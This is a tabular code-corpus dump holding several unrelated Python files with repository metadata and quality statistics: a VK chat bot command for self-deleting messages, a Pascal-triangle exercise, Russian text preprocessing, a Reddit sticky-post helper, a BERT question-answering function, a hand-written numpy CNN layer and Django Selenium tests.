hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
7743ca240ee591871b50f39538bcec9c1cbea542 | 2,076 | py | Python | idm/my_signals/bomb.py | Deril456/IrCA-Duty | 7aa934f446007f8816487e59d3cb5cf31696f3b9 | [
"MIT"
] | 1 | 2020-07-28T17:18:56.000Z | 2020-07-28T17:18:56.000Z | idm/my_signals/bomb.py | Deril456/IrCA-Duty | 7aa934f446007f8816487e59d3cb5cf31696f3b9 | [
"MIT"
] | null | null | null | idm/my_signals/bomb.py | Deril456/IrCA-Duty | 7aa934f446007f8816487e59d3cb5cf31696f3b9 | [
"MIT"
] | 1 | 2021-01-30T11:41:02.000Z | 2021-01-30T11:41:02.000Z | from idm.objects import DB, dp, MySignalEvent
from html import escape
import re
@dp.longpoll_event_register('б')
@dp.my_signal_event_register('б')
def bomb(event: MySignalEvent):
event.msg_op(3)
reply = ''
sticker = ''
data = False
att = []
text = ' '
hours = re.findall(r'\d+ ?ч\w*', event.msg['text'])
secs = re.findall(r'\d+ ?с\w*', event.msg['text'])
mins = re.findall(r'\d+ ?м\w*', event.msg['text'])
time = 0
for i in hours:
time += int(re.search(r'\d+', i)[0])*3600
for i in mins:
time += int(re.search(r'\d+', i)[0])*60
for i in secs:
time += int(re.search(r'\d+', i)[0])
if time == 0:
time = 60
elif time > 86400:
event.msg_op(2, '❗ Осади, максимальная длина - сутки')
return "ok"
if event.payload:
text = event.payload
data = True
if event.attachments:
att.extend(event.attachments)
data = True
if event.reply_message:
reply = event.reply_message['id']
if event.reply_message['from_id'] == event.db.duty_id:
atts = event.reply_message['attachments']
if atts:
atts = atts[0]
if atts['type'] == 'sticker':
sticker = atts['sticker']
sticker = int(sticker['sticker_id'])
data = False
event.api.msg_op(3, msg_id=event.reply_message['id'])
reply = ''
if not data:
if event.reply_message:
text = event.reply_message['text']
reply = ''
else:
event.msg_op(2, '❗ Ну и че мне отправить?')
return "ok"
text = text.replace("\n", "<br>")
event.api.exe('return API.messages.send({'+
f'peer_id:{event.chat.peer_id},'+
f'message:"{escape(text)}",'+
f'expire_ttl:{time},'+
f'attachment:"{",".join(att)}",'+
f'sticker_id:"{sticker}",'+
f'reply_to:"{reply}",'+
'random_id:0'+
'});', event.db.me_token)
return "ok" | 28.833333 | 73 | 0.517341 | 273 | 2,076 | 3.842491 | 0.333333 | 0.06673 | 0.113441 | 0.031459 | 0.077216 | 0.054337 | 0.054337 | 0.054337 | 0 | 0 | 0 | 0.01689 | 0.315511 | 2,076 | 72 | 74 | 28.833333 | 0.719916 | 0 | 0 | 0.190476 | 0 | 0 | 0.172845 | 0.051035 | 0 | 0 | 0 | 0 | 0 | 1 | 0.015873 | false | 0 | 0.047619 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
77457378c18a58bbbf6747011ba846504be5405e | 231 | py | Python | JiaLu/learn/list_training1.py | 13022108937/homework | 05b3c0535532766b286976b15245ed1f925da8c5 | [
"Apache-2.0"
] | null | null | null | JiaLu/learn/list_training1.py | 13022108937/homework | 05b3c0535532766b286976b15245ed1f925da8c5 | [
"Apache-2.0"
] | null | null | null | JiaLu/learn/list_training1.py | 13022108937/homework | 05b3c0535532766b286976b15245ed1f925da8c5 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
def test(n):
N = [1]
count = 0
while count < n:
print(N)
N.append(0)
N = [N[i-1] + N[i] for i in range(len(N))]
count += 1
count = int(input(">>> "))
test(count)
| 15.4 | 50 | 0.454545 | 38 | 231 | 2.763158 | 0.526316 | 0.057143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033113 | 0.34632 | 231 | 14 | 51 | 16.5 | 0.662252 | 0.08658 | 0 | 0 | 0 | 0 | 0.019048 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0 | 0 | 0.1 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
77472a5b88bd15c04f5e4d83d5cfd706840488ad | 6,116 | py | Python | src/utils/Preprocessing_text.py | SkylarPro/YandexCupCV | 103bb1abe4daacd72b5a72476e66cf33454807e8 | [
"MIT"
] | 1 | 2021-11-24T20:37:44.000Z | 2021-11-24T20:37:44.000Z | src/utils/Preprocessing_text.py | SkylarPro/YandexCupCV | 103bb1abe4daacd72b5a72476e66cf33454807e8 | [
"MIT"
] | null | null | null | src/utils/Preprocessing_text.py | SkylarPro/YandexCupCV | 103bb1abe4daacd72b5a72476e66cf33454807e8 | [
"MIT"
] | null | null | null | from itertools import chain
import pandas as pd
#!/usr/bin/env python
# coding: utf-8
# In[26]:
import pymorphy2
import multiprocessing as mp
from nltk.tokenize import TweetTokenizer
from typing import Dict, List,Tuple
import re
import string
config_prep_text = {
"path_to_csv":"Output.csv",
"path_from_csv":"Input.csv",
"remove_input_data":False,
"lower_text":True,
"only_ru_simb":True,
"clean_space": True,
"clean_link": True,
"clean_hashtag": True,
"clean_punct": True,
"word_to_lemma": True,
"min_len_sent" :1,
"stopwrd": [],
}
class PreprocText:
def __init__(self,config:Dict[str, bool], tokenizer=None,):
if tokenizer:
self.tokenizer = tokenizer
else:
self.tokenizer = TweetTokenizer(preserve_case=False,strip_handles=True,
reduce_len=True,
)
self.config = config
m = mp.Manager()
self._result_queue = m.Queue()
self.procc_text = []
self.balance_class = []
self._morph = pymorphy2.MorphAnalyzer(lang='ru')
self.empty_class = []
def _processing_text(self,proc_text):
idx = proc_text[0]
proc_text = proc_text[1]
print(proc_text)
proc_text = proc_text.lower() if self.config.get("lower_text") == True else proc_text
proc_text = re.sub('[^а-я]', " ",proc_text) if self.config.get("only_ru_simb") == True else proc_text
proc_text = proc_text.replace(" ", " ") if self.config.get("clean_space") == True else proc_text
proc_text = re.sub(r"http\S+", "",proc_text) if self.config.get("clean_link") == True else proc_text
proc_text = re.sub(r'#','',proc_text) if self.config.get("clean_hashtag") == True else proc_text
proc_text = [char for char in proc_text if char not in string.punctuation] if self.config.get("clean_punct") == True else proc_text
proc_text = ''.join(proc_text)
proc_text = ' '.join([word for word in proc_text.split() if word.lower() not in self._stpword]) if len(self.config.get("stopwrd")) != 0 else proc_text
if self.config.get("word_to_lemma") == True:
proc_text = self.tokenizer.tokenize(proc_text)
sent_lemm = []
for word in proc_text:
word_normal = self._morph.parse(word)[0]
#confidenc model to cast form word
if word_normal.score > 0.70:
sent_lemm.append(word_normal.normal_form)
else:
sent_lemm.append(word)
proc_text = ' '.join(sent_lemm)
return idx, proc_text
def _worker(self, task):
result = self._processing_text(task)
self._result_queue.put(result)
def _balans_start_index(self,class_count):
"""
Some sentences became empty after processing,
they need to be removed from the classes and
as a consequence, change the number of elements in the class.
"""
data_proc = []
step = [-1, 0]
min_len_sent = self.config.get("min_len_sent")
for idx, (_,text) in enumerate(self.procc_text):
if step[1] == idx:
step[0] += 1
step[1] += class_count[step[0]]
if len(text.split()) <= min_len_sent:
# минимальное количество слов в предложении
class_count[step[0]] -= 1
else:
data_proc.append(text)
if class_count[step[0]] == 0:
self.empty_class.append(step[0])
assert len(data_proc) == sum(class_count)
return data_proc, class_count
@property
def get_data(self,):
return self.procc_text, self.balance_class
def save_in_csv(self,id_img,remove_input_file = False):
idxs = list(chain.from_iterable([[label] * count for label, count in zip(id_img, self.balance_class)]))
data = {}
for idx, text in zip(idxs, self.procc_text):
if idx not in data:
data[idx] = []
data[idx].append(text)
data = {key:"SEP".join(data[key]) for key,val in data.items()}
pd.DataFrame({"id_imgs":data.keys(),
"text": data.values()
}).to_csv(self.config["path_to_csv"],index = False)
if self.config["remove_input_data"]:
os.remove(self.config["path_from_csv"])
return True
def processing_from_csv(self,):
df = pd.read_csv(self.config["path_from_csv"])
texts = [text.split("SEP") for text in df["text"]]
class_count = [len(sample) for sample in texts]
data = list(zip(range(sum(class_count)),chain.from_iterable(texts)))
id_imgs = df["id_imgs"].values
assert len(data) == sum(class_count),print(len(data), sum(class_count))
self.processing_big_data(data,class_count = class_count,id_img = id_imgs)
def processing_big_data(self,data, class_count = None, id_img = None, n_worker = 1):
with mp.Pool(n_worker) as p:
p.map(self._worker, data)
for _ in range(len(data)):
self.procc_text.append(self._result_queue.get())
assert len(self.procc_text) == len(data), f"{len(self.procc_text)} != {len(data)}"
print("Started sorting")
self.procc_text = sorted(self.procc_text)
if class_count:
self.procc_text, self.balance_class = self._balans_start_index(class_count)
else:
self.procc_text, self.balance_class = self.procc_text, None
if self.config["path_to_csv"].find(".csv")!=-1:
self.save_in_csv(id_img)
return self.procc_text, self.balance_class | 36.622754 | 160 | 0.565402 | 778 | 6,116 | 4.209512 | 0.231362 | 0.080611 | 0.051603 | 0.05374 | 0.22229 | 0.155725 | 0.095878 | 0.027176 | 0.018321 | 0 | 0 | 0.006494 | 0.320144 | 6,116 | 167 | 161 | 36.622754 | 0.781145 | 0.04431 | 0 | 0.05042 | 0 | 0 | 0.074055 | 0.003798 | 0 | 0 | 0 | 0 | 0.02521 | 1 | 0.067227 | false | 0 | 0.067227 | 0.008403 | 0.184874 | 0.02521 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
7747475d656042566415626e3982f5c6ffcfd3c2 | 699 | py | Python | kog/reddit/lists.py | GPelayo/kwantiko | b859419a3eb21a0015f69076c0a333d0cc8992d8 | [
"MIT"
] | null | null | null | kog/reddit/lists.py | GPelayo/kwantiko | b859419a3eb21a0015f69076c0a333d0cc8992d8 | [
"MIT"
] | null | null | null | kog/reddit/lists.py | GPelayo/kwantiko | b859419a3eb21a0015f69076c0a333d0cc8992d8 | [
"MIT"
] | null | null | null | from praw.models import Submission
from typing import Generator, Optional
from kog.reddit import create_reddit_object
MAX_STICKIES = 2
class SubredditStickies:
def __init__(self, subreddit_name: str, filter_substring: Optional[str] = ''):
self.reddit = create_reddit_object()
self.subreddit_name = subreddit_name
self.filter_substring = filter_substring
@property
def sticky_ids(self) -> Generator[Submission, None, None]:
for i in range(1, MAX_STICKIES+1):
sticky_id = self.reddit.subreddit(self.subreddit_name).sticky(i)
if self.filter_substring in self.reddit.submission(id=sticky_id).title:
yield sticky_id
| 34.95 | 83 | 0.712446 | 89 | 699 | 5.348315 | 0.426966 | 0.109244 | 0.107143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005405 | 0.206009 | 699 | 19 | 84 | 36.789474 | 0.852252 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.2 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
7748f676dcb533403a7279380d65acf0c31a7157 | 2,497 | py | Python | model.py | iliasi/BERT-model-Q-A | 84a4d2cc0a73da365b4d26e4ff8d09b47c89663f | [
"MIT"
] | null | null | null | model.py | iliasi/BERT-model-Q-A | 84a4d2cc0a73da365b4d26e4ff8d09b47c89663f | [
"MIT"
] | null | null | null | model.py | iliasi/BERT-model-Q-A | 84a4d2cc0a73da365b4d26e4ff8d09b47c89663f | [
"MIT"
] | null | null | null | from transformers import AutoTokenizer, AutoModelForQuestionAnswering
import torch
import textwrap
import streamlit as st
def answer_question(question, article_text):
'''
Takes a `question` string and an `article or essay` string,
it then identifies the words within the `article or essay` that are the
answer(s) to the question.
'''
tokenizer = AutoTokenizer.from_pretrained("bert-large-uncased-whole-word-masking-finetuned-squad")
model = AutoModelForQuestionAnswering.from_pretrained("bert-large-uncased-whole-word-masking-finetuned-squad")
# ======== Tokenize ========
# Apply the tokenizer to the input text, treating them as a text-pair.
input_ids = tokenizer.encode(question, article_text)
# ======== Set Segment IDs ========
# Search the input_ids for the first instance of the `[SEP]` token.
sep_index = input_ids.index(tokenizer.sep_token_id)
# The number of segment A tokens includes the [SEP] token istelf.
num_seg_a = sep_index + 1
# The remainder are segment B.
num_seg_b = len(input_ids) - num_seg_a
# Construct the list of 0s and 1s.
segment_ids = [0]*num_seg_a + [1]*num_seg_b
# There should be a segment_id for every input token.
assert len(segment_ids) == len(input_ids)
# ======== Evaluate ========
# Run our example through the model.
outputs = model(torch.tensor([input_ids]), # The tokens representing our input text.
token_type_ids=torch.tensor([segment_ids]), # The segment IDs to differentiate question from answer_text
return_dict=True)
start_scores = outputs.start_logits
end_scores = outputs.end_logits
# ======== Reconstruct Answer ========
# Find the tokens with the highest `start` and `end` scores.
answer_start = torch.argmax(start_scores)
answer_end = torch.argmax(end_scores)
# Get the string versions of the input tokens.
tokens = tokenizer.convert_ids_to_tokens(input_ids)
# Start with the first token.
answer = tokens[answer_start]
# Select the remaining answer tokens and join them with whitespace.
for i in range(answer_start + 1, answer_end + 1):
# If it's a subword token, then recombine it with the previous token.
if tokens[i][0:2] == '##':
answer += tokens[i][2:]
# Otherwise, add a space then the token.
else:
answer += ' ' + tokens[i]
return 'Answer: "' + answer + '"'
| 36.188406 | 124 | 0.664397 | 334 | 2,497 | 4.823353 | 0.368263 | 0.034761 | 0.013035 | 0.028554 | 0.074488 | 0.074488 | 0.074488 | 0.074488 | 0.074488 | 0.074488 | 0 | 0.005192 | 0.228674 | 2,497 | 68 | 125 | 36.720588 | 0.831256 | 0.415298 | 0 | 0 | 0 | 0 | 0.08398 | 0.074806 | 0 | 0 | 0 | 0 | 0.035714 | 1 | 0.035714 | false | 0 | 0.142857 | 0 | 0.214286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
774e02245b93db2b7e7c763898a30ac5929d71c3 | 5,945 | py | Python | CNN.py | LuranWang/machine_learning | d0de8a0a143bd4a436c1be3274828469d544178f | [
"Apache-2.0"
] | null | null | null | CNN.py | LuranWang/machine_learning | d0de8a0a143bd4a436c1be3274828469d544178f | [
"Apache-2.0"
] | null | null | null | CNN.py | LuranWang/machine_learning | d0de8a0a143bd4a436c1be3274828469d544178f | [
"Apache-2.0"
] | null | null | null | import numpy as np
class CNN_layer():
def __init__(self,strided_number=1,size_number=3,core_number=1):
self.input_number = None
self.input_layer=None
self.output_number = core_number
self.cores=None
self.size_number=size_number
self.strided = strided_number
self.output =None
self.cores_re=None
self.b=np.random.random()
self.db=None
self.x=None
self.dx=None
self.dtheta=None
self.velocity_b = 0
self.velocity_theta = 0
self.first_momentum_theta = 0
self.second_momentum_theta = 0
self.first_momentum_b = 0
self.second_momentum_b = 0
self.n=0
def fit(self,input):#input是四维数组
if self.n ==0:
self.cores = np.random.random((self.output_number, input.shape[1], self.size_number, self.size_number))-0.5
self.cores_re=np.zeros((self.output_number, input.shape[1], self.size_number, self.size_number))
else:
self.cores=self.cores
self.cores_re=np.zeros((self.output_number, input.shape[1], self.size_number, self.size_number))
self.x=input
self.input_number = input.shape[0]
self.input_layer=input.shape[1]
ilength=input.shape[3]
iwidth=input.shape[2]
clength=self.size_number
output = np.ones((input.shape[0],self.output_number, int((iwidth - clength) / self.strided + 1),
int((ilength - clength) / self.strided + 1)))
for lc in range(output.shape[0]):# 对于每个样本
for ic in range(output.shape[1]): # 对于每一层
for jc in range(output.shape[2]): # 对于每一列
for kc in range(output.shape[3]): # 对于每一行
cnn_result = np.sum(np.multiply(input[lc,:,
jc*self.strided:jc*self.strided+clength,kc*self.strided:kc*self.strided+clength],self.cores[ic,:,:,:]))
output[lc,ic,jc,kc]=cnn_result
self.output=output+self.b
self.n+=1
return self.output
def fit_dx(self, input, cores): # input为五维度向量,一维batch,二维输出数,三维输入channel数,四维宽,五维长对于dx
clength = self.size_number
output = np.ones((self.x.shape))
for lc in range(output.shape[0]): # 对于每个样本
for ic in range(output.shape[1]): # 对于每一层
for jc in range(output.shape[2]): # 对于每一列
for kc in range(output.shape[3]): # 对于每一行
cnn_result = np.sum(np.multiply(input[lc, :, :,
jc * self.strided:jc * self.strided + clength,
kc * self.strided:kc * self.strided + clength],
cores[:, :, :, :])) / self.x.shape[0]
output[lc, ic, jc, kc] = cnn_result
output = output + self.b
return output
def fit_dtheta(self, input, cores):
clength = cores.shape[-1]
output = np.ones((self.cores.shape))
sum=0
for lc in range(output.shape[0]): # 对于每个核
for ic in range(output.shape[1]): # 对于每一层
for jc in range(output.shape[2]): # 对于每一列
for kc in range(output.shape[3]): # 对于每一行
for b in range(input.shape[0]):#对于每个样本
sum += np.sum(np.multiply(input[b, ic,
jc * self.strided:jc * self.strided + clength,
kc * self.strided:kc * self.strided + clength],
cores[b, lc, :, :])) / input.shape[0]
output[lc, ic, jc, kc] = sum
sum=0
return output
def g_cnn(self,input):
output_rearrange=np.zeros((self.output.shape[0],self.output.shape[1],self.input_layer,self.output.shape[2]+self.x.shape[-1]-1,self.output.shape[3]+self.x.shape[-1]-1))
for ic1 in range(input.shape[0]):
for kc1 in range(input.shape[1]):
for lc1 in range(output_rearrange.shape[2]):
output_rearrange[ic1,kc1,lc1,self.size_number-1:self.size_number-1+self.output.shape[3],
self.size_number-1:self.size_number-1+self.output.shape[3]]=input[ic1,kc1,:,:]#此处输入与上函数输出大小一致
for ic1 in range(self.cores.shape[0]):
for kc1 in range(self.cores.shape[1]):
self.cores_re[ic1,kc1,:,:]=np.flipud(np.fliplr(self.cores[ic1,kc1,:,:]))
self.dx=self.fit_dx(output_rearrange,self.cores_re)
cores_re1=np.zeros((input.shape))
#for ic2 in range(input.shape[0]):
#for kc2 in range(input.shape[1]):
#cores_re1[ic2,kc2,:,:]=input[ic2,kc2,:,:]
self.dtheta=self.fit_dtheta(self.x,input)
self.db=np.sum(input)
return self.dx
def momentum(self,rho=0.9, alpha=0.0005):
self.velocity_b=rho*self.velocity_b+(1-rho)*self.db
self.b-=alpha*self.velocity_b
self.velocity_theta = rho * self.velocity_theta + (1-rho)*self.dtheta
self.cores -= alpha * self.velocity_theta
def Adam(self,beta1,beta2,alpha):
self.first_momentum_b = beta1 * self.first_momentum_b + (1 - beta1) * self.db
self.second_momentum_b = beta2 * self.first_momentum_b + (1 - beta2) * self.db
self.b+= alpha*self.first_momentum_b / (np.sqrt(self.second_momentum_b) + 1e-7)
self.first_momentum_theta = beta1 * self.first_momentum_theta + (1 - beta1) * self.dtheta
self.second_momentum_theta = beta2 * self.first_momentum_theta + (1 - beta2) * self.dtheta
self.dtheta = self.first_momentum_theta / (np.sqrt(self.second_momentum_theta) + 1e-7) | 54.045455 | 176 | 0.550378 | 784 | 5,945 | 4.053571 | 0.114796 | 0.044053 | 0.057269 | 0.067967 | 0.474827 | 0.370673 | 0.329138 | 0.278162 | 0.278162 | 0.278162 | 0 | 0.027854 | 0.323633 | 5,945 | 110 | 177 | 54.045455 | 0.762497 | 0.044071 | 0 | 0.247619 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.009524 | 0 | 0.12381 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
774e354573df9ecbd90ef267a28d523c42f1494e | 4,545 | py | Python | functional_tests/test.py | pavle-batuta/djangoTDD | e618ef17f5fc06a5393ebc1986ef209905e21403 | [
"MIT"
] | null | null | null | functional_tests/test.py | pavle-batuta/djangoTDD | e618ef17f5fc06a5393ebc1986ef209905e21403 | [
"MIT"
] | null | null | null | functional_tests/test.py | pavle-batuta/djangoTDD | e618ef17f5fc06a5393ebc1986ef209905e21403 | [
"MIT"
] | null | null | null | from django.contrib.staticfiles.testing import StaticLiveServerTestCase
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import unittest
import time
class NewVisitorTest(StaticLiveServerTestCase):
"""Test case for a new visitor"""
def setUp(self):
self.browser = webdriver.Firefox()
self.browser.implicitly_wait(3)
def tearDown(self):
self.browser.quit()
def check_for_row_in_list_table(self, row_text):
table = self.browser.find_element_by_id('id_list_table')
rows = table.find_elements_by_tag_name('tr')
self.assertIn(row_text, [row.text for row in rows])
def test_can_start_a_list_and_retrieve_it_later(self):
user_1_test_strings = [
'Buy peacock feathers',
'Use peacock feathers to make a fly',
]
user_2_test_strings = [
'Buy milk',
]
user1_correct_strings = [
'1: Buy peacock feathers',
'2: Use peacock feathers to make a fly',
]
user2_correct_strings = [
'1: Buy milk',
]
# Check out the homepage
self.browser.get(self.live_server_url)
# Page title and header should mention to-do lists
self.assertIn('To-Do', self.browser.title)
header_text = self.browser.find_element_by_tag_name('h1').text
self.assertIn('To-Do', header_text)
# The user is invited to enter a to-do item immediately
inputbox = self.browser.find_element_by_id('id_new_item')
self.assertEqual(
inputbox.get_attribute('placeholder'),
'Enter a to-do item'
)
# The user types in 'Buy peacock feathers' for some reason that I cannot fathom
inputbox.send_keys(user_1_test_strings[0])
# The user hits enter.
inputbox.send_keys(Keys.ENTER)
# Check if the list URL is valid!
user1_url = self.browser.current_url
self.assertRegex(user1_url, '/lists/.+')
# The page updates
# Page now lists "1: Buy peacock feathers" as an item in a to-do list
self.check_for_row_in_list_table(user1_correct_strings[0])
# There is still a text box for entering another item.
# The user enters: 'Use peacock feathers to make a fly'
inputbox = self.browser.find_element_by_id('id_new_item')
inputbox.send_keys(user_1_test_strings[1])
# The user hits enter
inputbox.send_keys(Keys.ENTER)
# The page updates again.
# Both items are present on the list.
self.check_for_row_in_list_table(user1_correct_strings[1])
# The site has generated a unique URL for the user.
# The user goes to the great userspace in the sky.
## Make sure no information from the previous user is corrupting the
# new users experience (cookies etc) ##
self.browser.quit()
self.browser = webdriver.Firefox()
# A new user is spawned!
# User visits the homepage
# Check if there is not garbage left behind by the previous user.
self.browser.get(self.live_server_url)
page_text = self.browser.find_element_by_tag_name('body').text
self.assertNotIn(user_1_test_strings[0], page_text)
self.assertNotIn(user_1_test_strings[1], page_text)
# The user#2 is a boring man named Ted. Ted want's to buy milk because
# he has nothing better to do. Get a hold of yourself Ted!
inputbox = self.browser.find_element_by_id('id_new_item')
inputbox.send_keys(user_2_test_strings[0])
# The user hits enter.
inputbox.send_keys(Keys.ENTER)
# User#2 gets his own URL.
user2_url = self.browser.current_url
self.assertRegex(user2_url, '/lists/.+')
self.assertNotEqual(user1_url, user2_url)
# Check if there is no trace of the previous list
page_text = self.browser.find_element_by_tag_name('body').text
self.assertNotIn(user_1_test_strings[0], page_text)
self.assertNotIn(user_1_test_strings[1], page_text)
# Check if we have User#2's stuff
self.check_for_row_in_list_table(user2_correct_strings[0])
# Ted snaps, quits his job and moves to the Peruvian jungle.
# He is happy there.
# The milks stays unbought.
# All is well.
#
def test_layout_and_styling(self):
# Caveman Zogg visits the homepage
self.browser.get(self.live_server_url)
self.browser.set_window_size(1024, 768)
# Caveman notices the input box is nicely centered
inputbox = self.browser.find_element_by_id('id_new_item')
## Should be on the middle of the screen (1024/2=512)
# with a variance +/- 5px. ##
self.assertAlmostEqual(
inputbox.location['x'] + inputbox.size['width'] / 2,
512,
delta=5
)
# Caveman enters "rock".
inputbox.send_keys('rock\n')
inputbox = self.browser.find_element_by_id('id_new_item')
self.assertAlmostEqual(
inputbox.location['x'] + inputbox.size['width'] / 2,
512,
delta=5
)
